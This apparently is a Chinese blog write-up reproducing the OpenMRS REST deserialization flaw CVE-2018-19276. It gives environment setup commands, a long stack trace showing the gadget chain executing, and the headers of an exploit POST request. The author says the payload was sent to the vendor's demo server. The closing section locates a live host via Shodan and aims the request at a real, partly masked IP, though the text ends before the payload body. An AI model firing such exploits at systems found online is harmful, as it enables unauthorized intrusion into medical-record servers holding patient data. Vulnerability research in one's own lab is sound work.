OpenMRS反序列化漏洞（CVE-2018-19276）

感觉跟S2-052的CVE-2017-9805的payload有点像，但是没找到触发的地方。
参考：
https://www.bishopfox.com/news/2019/02/openmrs-insecure-object-deserialization/
https://www.exploit-db.com/exploits/46327
https://talk.openmrs.org/t/question-about-web-services-cve-on-older-versions-of-openmrs/21677/3
向官方演示站（demo.openmrs.org）发送payload发现已经不能触发：

环境搭建

Linux

调试（使用intellij Idea）

参考：https://wiki.openmrs.org/display/docs/Developer+How-To+Setup+And+Use+IntelliJ
看到教程说是需要安装rest API，然后需要用maven安装一些依赖。

git clone https://github.com/openmrs/openmrs-module-webservices.rest
cd openmrs-module-webservices.rest

然后根据漏洞描述，该漏洞在2.24.0中被修复，所以找到2.23.0的commit，

然后checkout。

git checkout f44f68ee -b f44f68ee
mvn clean install -DskipTests //不运行测试节省时间

编译的过程是漫长的，耐心等待。
安装完成之后是这样的：

Windows

在Windows上使用下载好的war包，成功复现了。
先尝试自己搭建环境，

wget https://jaist.dl.sourceforge.net/project/openmrs/releases/OpenMRS_Platform_2.1.3/openmrs.war

然后将war包放到tomcat的webapps目录下，自动解压。
搭建完成之后直接访问/openmrs/ws/rest/v1/patient，

ERROR - BaseRestController.handleException(115) |2019-02-12 21:58:35,576| Could
not read [class org.openmrs.module.webservices.rest.SimpleObject]; nested except
ion is org.springframework.oxm.UnmarshallingFailureException: XStream unmarshall
ing exception; nested exception is com.thoughtworks.xstream.converters.Conversio
nException: java.lang.String cannot be cast to java.security.Provider$Service :
java.lang.String cannot be cast to java.security.Provider$Service
---- Debugging information ----
message             : java.lang.String cannot be cast to java.security.Provider$
Service
cause-exception     : java.lang.ClassCastException
cause-message       : java.lang.String cannot be cast to java.security.Provider$
Service
class               : java.util.HashMap
required-type       : java.util.HashMap
converter-type      : com.thoughtworks.xstream.converters.collections.MapConvert
er
path                : /map/entry
line number         : 48
version             : 4.1.4.RELEASE
-------------------------------
org.springframework.http.converter.HttpMessageNotReadableException: Could not re
ad [class org.openmrs.module.webservices.rest.SimpleObject]; nested exception is
 org.springframework.oxm.UnmarshallingFailureException: XStream unmarshalling ex
ception; nested exception is com.thoughtworks.xstream.converters.ConversionExcep
tion: java.lang.String cannot be cast to java.security.Provider$Service : java.l
ang.String cannot be cast to java.security.Provider$Service
---- Debugging information ----
message             : java.lang.String cannot be cast to java.security.Provider$
Service
cause-exception     : java.lang.ClassCastException
cause-message       : java.lang.String cannot be cast to java.security.Provider$
Service
class               : java.util.HashMap
required-type       : java.util.HashMap
converter-type      : com.thoughtworks.xstream.converters.collections.MapConvert
er
path                : /map/entry
line number         : 48
version             : 4.1.4.RELEASE
-------------------------------
        at org.springframework.http.converter.xml.MarshallingHttpMessageConverte
r.readFromSource(MarshallingHttpMessageConverter.java:134)
        at org.springframework.http.converter.xml.AbstractXmlHttpMessageConverte
r.readInternal(AbstractXmlHttpMessageConverter.java:61)
        at org.springframework.http.converter.AbstractHttpMessageConverter.read(
AbstractHttpMessageConverter.java:159)
        at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.
readWithMessageConverters(HandlerMethodInvoker.java:646)
        at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.
resolveRequestBody(HandlerMethodInvoker.java:609)
        at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.
resolveHandlerArguments(HandlerMethodInvoker.java:358)
        at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.
invokeHandlerMethod(HandlerMethodInvoker.java:172)
        at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandle
rAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:446)
        at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandle
rAdapter.handle(AnnotationMethodHandlerAdapter.java:434)
        at org.springframework.web.servlet.DispatcherServlet.doDispatch(Dispatch
erServlet.java:943)
        at org.springframework.web.servlet.DispatcherServlet.doService(Dispatche
rServlet.java:877)
        at org.springframework.web.servlet.FrameworkServlet.processRequest(Frame
workServlet.java:966)
        at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServ
let.java:868)
        at javax.servlet.http.HttpServlet.service(HttpServlet.java:650)
        at org.springframework.web.servlet.FrameworkServlet.service(FrameworkSer
vlet.java:842)
        at javax.servlet.http.HttpServlet.service(HttpServlet.java:731)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:303)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
        at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52
)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
        at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilter
Chain.java:72)
        at org.openmrs.web.filter.GZIPFilter.doFilterInternal(GZIPFilter.java:64
)
        at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerR
equestFilter.java:107)
        at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilter
Chain.java:70)
        at org.openmrs.module.webservices.rest.web.filter.AuthorizationFilter.do
Filter(AuthorizationFilter.java:104)
        at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilter
Chain.java:70)
        at org.springframework.web.filter.ShallowEtagHeaderFilter.doFilterIntern
al(ShallowEtagHeaderFilter.java:82)
        at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerR
equestFilter.java:107)
        at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilter
Chain.java:70)
        at org.openmrs.module.owa.filter.OwaFilter.doFilter(OwaFilter.java:64)
        at org.openmrs.module.web.filter.ModuleFilterChain.doFilter(ModuleFilter
Chain.java:70)
        at org.openmrs.module.web.filter.ModuleFilter.doFilter(ModuleFilter.java
:54)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
        at org.openmrs.web.filter.OpenmrsFilter.doFilterInternal(OpenmrsFilter.j
ava:108)
        at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerR
equestFilter.java:107)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
        at org.springframework.orm.hibernate4.support.OpenSessionInViewFilter.do
FilterInternal(OpenSessionInViewFilter.java:150)
        at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerR
equestFilter.java:107)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
        at org.openmrs.web.filter.StartupFilter.doFilter(StartupFilter.java:105)

        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
        at org.openmrs.web.filter.StartupFilter.doFilter(StartupFilter.java:105)

        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
        at org.openmrs.web.filter.StartupFilter.doFilter(StartupFilter.java:105)

        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
        at org.springframework.web.filter.CharacterEncodingFilter.doFilterIntern
al(CharacterEncodingFilter.java:88)
        at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerR
equestFilter.java:107)
        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(Appl
icationFilterChain.java:241)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationF
ilterChain.java:208)
        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperV
alve.java:218)
        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextV
alve.java:110)
        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(Authentica
torBase.java:506)
        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.j
ava:169)
        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.j
ava:103)
        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:
962)
        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineVal
ve.java:116)
        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.jav
a:445)
        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp
11Processor.java:1115)
        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(
AbstractProtocol.java:637)
        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoin
t.java:316)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.
java:1149)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor
.java:624)
        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskTh
read.java:61)
        at java.lang.Thread.run(Thread.java:748)
Caused by: org.springframework.oxm.UnmarshallingFailureException: XStream unmars
halling exception; nested exception is com.thoughtworks.xstream.converters.Conve
rsionException: java.lang.String cannot be cast to java.security.Provider$Servic
e : java.lang.String cannot be cast to java.security.Provider$Service
---- Debugging information ----
message             : java.lang.String cannot be cast to java.security.Provider$
Service
cause-exception     : java.lang.ClassCastException
cause-message       : java.lang.String cannot be cast to java.security.Provider$
Service
class               : java.util.HashMap
required-type       : java.util.HashMap
converter-type      : com.thoughtworks.xstream.converters.collections.MapConvert
er
path                : /map/entry
line number         : 48
version             : 4.1.4.RELEASE
-------------------------------
        at org.springframework.oxm.xstream.XStreamMarshaller.convertXStreamExcep
tion(XStreamMarshaller.java:839)
        at org.springframework.oxm.xstream.XStreamMarshaller.doUnmarshal(XStream
Marshaller.java:817)
        at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalReader(XSt
reamMarshaller.java:805)
        at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalInputStrea
m(XStreamMarshaller.java:795)
        at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalInputStrea
m(XStreamMarshaller.java:787)
        at org.springframework.oxm.xstream.XStreamMarshaller.unmarshalStreamSour
ce(XStreamMarshaller.java:736)
        at org.springframework.oxm.support.AbstractMarshaller.unmarshal(Abstract
Marshaller.java:324)
        at org.springframework.http.converter.xml.MarshallingHttpMessageConverte
r.readFromSource(MarshallingHttpMessageConverter.java:127)
        ... 70 more
Caused by: com.thoughtworks.xstream.converters.ConversionException: java.lang.St
ring cannot be cast to java.security.Provider$Service : java.lang.String cannot
be cast to java.security.Provider$Service
---- Debugging information ----
message             : java.lang.String cannot be cast to java.security.Provider$
Service
cause-exception     : java.lang.ClassCastException
cause-message       : java.lang.String cannot be cast to java.security.Provider$
Service
class               : java.util.HashMap
required-type       : java.util.HashMap
converter-type      : com.thoughtworks.xstream.converters.collections.MapConvert
er
path                : /map/entry
line number         : 48
version             : 4.1.4.RELEASE
-------------------------------
        at com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshall
er.java:79)
        at com.thoughtworks.xstream.core.AbstractReferenceUnmarshaller.convert(A
bstractReferenceUnmarshaller.java:65)
        at com.thoughtworks.xstream.core.TreeUnmarshaller.convertAnother(TreeUnm
arshaller.java:66)
        at com.thoughtworks.xstream.core.TreeUnmarshaller.convertAnother(TreeUnm
arshaller.java:50)
        at com.thoughtworks.xstream.core.TreeUnmarshaller.start(TreeUnmarshaller
.java:134)
        at com.thoughtworks.xstream.core.AbstractTreeMarshallingStrategy.unmarsh
al(AbstractTreeMarshallingStrategy.java:32)
        at com.thoughtworks.xstream.XStream.unmarshal(XStream.java:1058)
        at org.springframework.oxm.xstream.XStreamMarshaller.doUnmarshal(XStream
Marshaller.java:814)
        ... 76 more
Caused by: java.lang.ClassCastException: java.lang.String cannot be cast to java
.security.Provider$Service
        at javax.crypto.Cipher.chooseFirstProvider(Cipher.java:745)
        at javax.crypto.Cipher.update(Cipher.java:1827)
        at javax.crypto.CipherInputStream.getMoreData(CipherInputStream.java:132
)
        at javax.crypto.CipherInputStream.read(CipherInputStream.java:239)
        at com.sun.xml.internal.bind.v2.util.ByteArrayOutputStreamEx.readFrom(By
teArrayOutputStreamEx.java:65)
        at com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.get(Base
64Data.java:182)
        at com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.toString
(Base64Data.java:286)
        at jdk.nashorn.internal.objects.NativeString.getStringValue(NativeString
.java:121)
        at jdk.nashorn.internal.objects.NativeString.hashCode(NativeString.java:
117)
        at java.util.HashMap.hash(HashMap.java:339)
        at java.util.HashMap.put(HashMap.java:612)
        at com.thoughtworks.xstream.converters.collections.MapConverter.putCurre
ntEntryIntoMap(MapConverter.java:93)
        at com.thoughtworks.xstream.converters.collections.MapConverter.populate
Map(MapConverter.java:78)
        at com.thoughtworks.xstream.converters.collections.MapConverter.populate
Map(MapConverter.java:72)
        at com.thoughtworks.xstream.converters.collections.MapConverter.unmarsha
l(MapConverter.java:67)
        at com.thoughtworks.xstream.core.TreeUnmarshaller.convert(TreeUnmarshall
er.java:72)
        ... 83 more

在线搜索

在shodan上找一个。
payload:

POST /openmrs/ws/rest/v1/patient HTTP/1.1
Host: 54.218.x.y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Connection: close
Content-Type: text/xml
Content-Length: 2392